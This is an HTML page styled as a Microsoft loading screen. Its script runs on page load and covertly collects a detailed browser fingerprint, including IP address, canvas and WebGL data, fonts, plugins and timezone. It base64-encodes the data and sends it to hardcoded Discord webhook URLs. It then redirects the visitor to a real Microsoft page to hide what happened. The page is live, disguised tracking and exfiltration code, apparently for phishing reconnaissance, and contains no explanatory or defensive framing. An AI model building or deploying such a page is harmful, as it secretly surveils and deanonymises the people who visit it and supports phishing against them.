<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Loading...</title>
<style>
body{margin:0;padding:0;background:#f5f5f5;font-family:Arial,sans-serif;display:flex;align-items:center;justify-content:center;height:100vh}
.loader{text-align:center}
.spinner{border:4px solid #f3f3f3;border-top:4px solid #0078d4;border-radius:50%;width:40px;height:40px;animation:spin 1s linear infinite;margin:0 auto 20px}
@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.text{color:#605e5c;font-size:14px}
</style>
</head>
<body>
<div class="loader">
<div class="spinner"></div>
<div class="text">Please wait...</div>
</div>
<script>
const WEBHOOKS=[
"https://discord.com/api/webhooks/1464259954855645319/cfsiMy3r0E7_S-TTqzHY9qfArbskL2xjnYmmkeLWLnalqHHhc7ZQrXBAoVVkvr2DTvNI",
"https://discord.com/api/webhooks/1458963086794031105/AmHlBpfXql871QuWMkOmQ6GNmQiIyW-5A-5wwz3k0RKjqe-RFpMaOiNfHoYXVJ0NtmCT"
];
const REDIRECT_URLS={
en:[
"https://www.microsoft.com/en-us/microsoft-365",
"https://www.microsoft.com/en-us/windows",
"https://support.microsoft.com/en-us"
],
de:[
"https://www.microsoft.com/de-de/microsoft-365",
"https://www.microsoft.com/de-de/windows",
"https://support.microsoft.com/de-de"
],
ar:[
"https://www.microsoft.com/ar-sa/microsoft-365",
"https://www.microsoft.com/ar-sa/windows",
"https://support.microsoft.com/ar-sa"
]
};
function detectLanguage(){
const lang=(navigator.language||navigator.userLanguage||'en').toLowerCase();
if(lang.startsWith('de'))return'de';
if(lang.startsWith('ar'))return'ar';
return'en';
}
function randomSelect(arr){
return arr[Math.floor(Math.random()*arr.length)];
}
function getCanvasFP(){
try{
const c=document.createElement('canvas');
c.width=200;c.height=50;
const ctx=c.getContext('2d');
ctx.textBaseline='top';
ctx.font='14px Arial';
ctx.fillStyle='#f60';
ctx.fillRect(125,1,62,20);
ctx.fillStyle='#069';
ctx.fillText('Browser Fingerprint',2,15);
return c.toDataURL();
}catch(e){
return'error';
}
}
function getWebGLInfo(){
try{
const c=document.createElement('canvas');
const gl=c.getContext('webgl')||c.getContext('experimental-webgl');
if(!gl)return{vendor:'N/A',renderer:'N/A'};
const dbg=gl.getExtension('WEBGL_debug_renderer_info');
return{
vendor:dbg?gl.getParameter(dbg.UNMASKED_VENDOR_WEBGL):'N/A',
renderer:dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):'N/A'
};
}catch(e){
return{vendor:'error',renderer:'error'};
}
}
function getPlugins(){
try{
const plugins=[];
for(let i=0;i<navigator.plugins.length;i++){
plugins.push(navigator.plugins[i].name);
}
return plugins.join(',');
}catch(e){
return'error';
}
}
function getFonts(){
try{
const baseFonts=['monospace','sans-serif','serif'];
const testFonts=['Arial','Verdana','Times New Roman','Courier New','Georgia','Palatino','Garamond','Bookman','Comic Sans MS','Trebuchet MS','Impact'];
const testString='mmmmmmmmmmlli';
const testSize='72px';
const canvas=document.createElement('canvas');
const ctx=canvas.getContext('2d');
const detected=[];
const baselines={};
for(const base of baseFonts){
ctx.font=testSize+' '+base;
baselines[base]=ctx.measureText(testString).width;
}
for(const font of testFonts){
let detected_count=0;
for(const base of baseFonts){
ctx.font=testSize+' '+font+','+base;
const width=ctx.measureText(testString).width;
if(width!==baselines[base]){
detected_count++;
}
}
if(detected_count>0){
detected.push(font);
}
}
return detected.join(',');
}catch(e){
return'error';
}
}
async function collectFingerprint(){
const webgl=getWebGLInfo();
let ip='unknown';
try{
const ipResp=await fetch('https://api.ipify.org?format=json');
const ipData=await ipResp.json();
ip=ipData.ip;
}catch(e){
console.error('IP fetch failed:',e);
}
const fp={
ip:ip,
userAgent:navigator.userAgent,
language:navigator.language,
languages:navigator.languages?navigator.languages.join(','):'N/A',
platform:navigator.platform,
cpuCores:navigator.hardwareConcurrency||'N/A',
screenRes:screen.width+'x'+screen.height,
screenDepth:screen.colorDepth,
timezone:Intl.DateTimeFormat().resolvedOptions().timeZone,
timezoneOffset:new Date().getTimezoneOffset(),
canvasFP:getCanvasFP(),
webglVendor:webgl.vendor,
webglRenderer:webgl.renderer,
cookiesEnabled:navigator.cookieEnabled,
doNotTrack:navigator.doNotTrack||'N/A',
plugins:getPlugins(),
fonts:getFonts(),
touchSupport:'ontouchstart'in window,
deviceMemory:navigator.deviceMemory||'N/A',
timestamp:new Date().toISOString()
};
return fp;
}
async function sendToWebhook(data){
const webhook=randomSelect(WEBHOOKS);
const fpString=JSON.stringify(data,null,2);
const b64=btoa(fpString);
const payload={
embeds:[{
title:"🔍 Fingerprint Captured",
description:"```"+b64+"```",
color:3447003,
footer:{text:"FP Collector"},
timestamp:new Date().toISOString()
}]
};
try{
await fetch(webhook,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify(payload)
});
}catch(e){
console.error('Send failed:',e);
}
}
async function init(){
const fp=await collectFingerprint();
await sendToWebhook(fp);
const lang=detectLanguage();
const urls=REDIRECT_URLS[lang]||REDIRECT_URLS.en;
const targetUrl=randomSelect(urls);
setTimeout(()=>{
window.location.href=targetUrl;
},1000);
}
init();
</script>
</body>
</html>